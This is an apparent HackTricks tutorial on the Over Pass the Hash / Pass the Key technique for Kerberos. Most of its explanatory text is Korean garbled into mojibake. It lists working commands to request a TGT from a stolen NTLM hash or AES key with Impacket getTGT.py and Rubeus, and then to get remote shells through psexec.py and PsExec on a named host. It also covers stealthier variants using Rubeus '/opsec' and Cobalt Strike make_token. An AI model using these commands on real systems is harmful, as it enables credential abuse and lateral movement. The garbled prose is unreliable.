Over Pass the Hash/Pass the Key

Tip

Learn and practice AWS hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn and practice Azure hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Overpass The Hash/Pass The Key (PTK)

Overpass The Hash/Pass The Key (PTK) ๊ณต๊ฒฉ์€ ์ „ํ†ต์ ์ธ NTLM ํ”„๋กœํ† ์ฝœ์ด ์ œํ•œ๋˜๊ณ  Kerberos ์ธ์ฆ์ด ์šฐ์„ ์‹œ๋˜๋Š” ํ™˜๊ฒฝ์„ ์œ„ํ•ด ์„ค๊ณ„๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ด ๊ณต๊ฒฉ์€ ์‚ฌ์šฉ์ž์˜ NTLM ํ•ด์‹œ ๋˜๋Š” AES ํ‚ค๋ฅผ ํ™œ์šฉํ•˜์—ฌ Kerberos ํ‹ฐ์ผ“์„ ์š”์ฒญํ•จ์œผ๋กœ์จ ๋„คํŠธ์›Œํฌ ๋‚ด์˜ ๋ฆฌ์†Œ์Šค์— ๋Œ€ํ•œ ๋ฌด๋‹จ ์ ‘๊ทผ์„ ๊ฐ€๋Šฅํ•˜๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค.

์ด ๊ณต๊ฒฉ์„ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•œ ์ฒซ ๋ฒˆ์งธ ๋‹จ๊ณ„๋Š” ๋Œ€์ƒ ์‚ฌ์šฉ์ž์˜ ๊ณ„์ •์˜ NTLM ํ•ด์‹œ ๋˜๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ํš๋“ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด ์ •๋ณด๋ฅผ ํ™•๋ณดํ•œ ํ›„, ํ•ด๋‹น ๊ณ„์ •์— ๋Œ€ํ•œ ํ‹ฐ์ผ“ ๋ถ€์—ฌ ํ‹ฐ์ผ“(TGT)์„ ์–ป์„ ์ˆ˜ ์žˆ์œผ๋ฉฐ, ์ด๋ฅผ ํ†ตํ•ด ๊ณต๊ฒฉ์ž๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ์„ ๊ฐ€์ง„ ์„œ๋น„์Šค๋‚˜ ๋จธ์‹ ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

The process can be started with the following commands:

python getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

AES256์ด ํ•„์š”ํ•œ ์‹œ๋‚˜๋ฆฌ์˜ค์—์„œ๋Š” -aesKey [AES key] ์˜ต์…˜์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ, ํš๋“ํ•œ ํ‹ฐ์ผ“์€ smbexec.py ๋˜๋Š” wmiexec.py์™€ ๊ฐ™์€ ๋‹ค์–‘ํ•œ ๋„๊ตฌ์™€ ํ•จ๊ป˜ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ์–ด ๊ณต๊ฒฉ์˜ ๋ฒ”์œ„๋ฅผ ๋„“ํž™๋‹ˆ๋‹ค.

Errors such as PyAsn1Error or _KDC cannot find the name_ are usually resolved by updating the Impacket library or by using the hostname instead of the IP address, which keeps the request compatible with the Kerberos KDC.

An alternative command sequence using Rubeus.exe shows another facet of the technique:

.\Rubeus.exe asktgt /domain:jurassic.park /user:velociraptor /rc4:2a3de7fe356ee524cc9f3d579f2e0aa7 /ptt
.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

์ด ๋ฐฉ๋ฒ•์€ Pass the Key ์ ‘๊ทผ ๋ฐฉ์‹์„ ๋ฐ˜์˜ํ•˜๋ฉฐ, ์ธ์ฆ ๋ชฉ์ ์œผ๋กœ ํ‹ฐ์ผ“์„ ์ง์ ‘ ์žฅ์•…ํ•˜๊ณ  ํ™œ์šฉํ•˜๋Š” ๋ฐ ์ค‘์ ์„ ๋‘ก๋‹ˆ๋‹ค. TGT ์š”์ฒญ์˜ ์‹œ์ž‘์€ ์ด๋ฒคํŠธ 4768: A Kerberos authentication ticket (TGT) was requested๋ฅผ ํŠธ๋ฆฌ๊ฑฐํ•˜๋ฉฐ, ์ด๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ RC4-HMAC ์‚ฌ์šฉ์„ ๋‚˜ํƒ€๋‚ด์ง€๋งŒ, ์ตœ์‹  Windows ์‹œ์Šคํ…œ์€ AES256์„ ์„ ํ˜ธํ•ฉ๋‹ˆ๋‹ค.

์šด์˜ ๋ณด์•ˆ์— ๋ถ€ํ•ฉํ•˜๊ณ  AES256์„ ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•ด ๋‹ค์Œ ๋ช…๋ น์„ ์ ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

.\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec

Stealthier version

Warning

๊ฐ ๋กœ๊ทธ์˜จ ์„ธ์…˜์€ ํ•œ ๋ฒˆ์— ํ•˜๋‚˜์˜ ํ™œ์„ฑ TGT๋งŒ ๊ฐ€์งˆ ์ˆ˜ ์žˆ์œผ๋ฏ€๋กœ ์ฃผ์˜ํ•˜์„ธ์š”.

  1. Cobalt Strike์˜ **make_token**์„ ์‚ฌ์šฉํ•˜์—ฌ ์ƒˆ๋กœ์šด ๋กœ๊ทธ์˜จ ์„ธ์…˜์„ ๋งŒ๋“ญ๋‹ˆ๋‹ค.
  2. ๊ทธ๋Ÿฐ ๋‹ค์Œ, Rubeus๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๊ธฐ์กด ์„ธ์…˜์— ์˜ํ–ฅ์„ ์ฃผ์ง€ ์•Š๊ณ  ์ƒˆ๋กœ์šด ๋กœ๊ทธ์˜จ ์„ธ์…˜์— ๋Œ€ํ•œ TGT๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค.
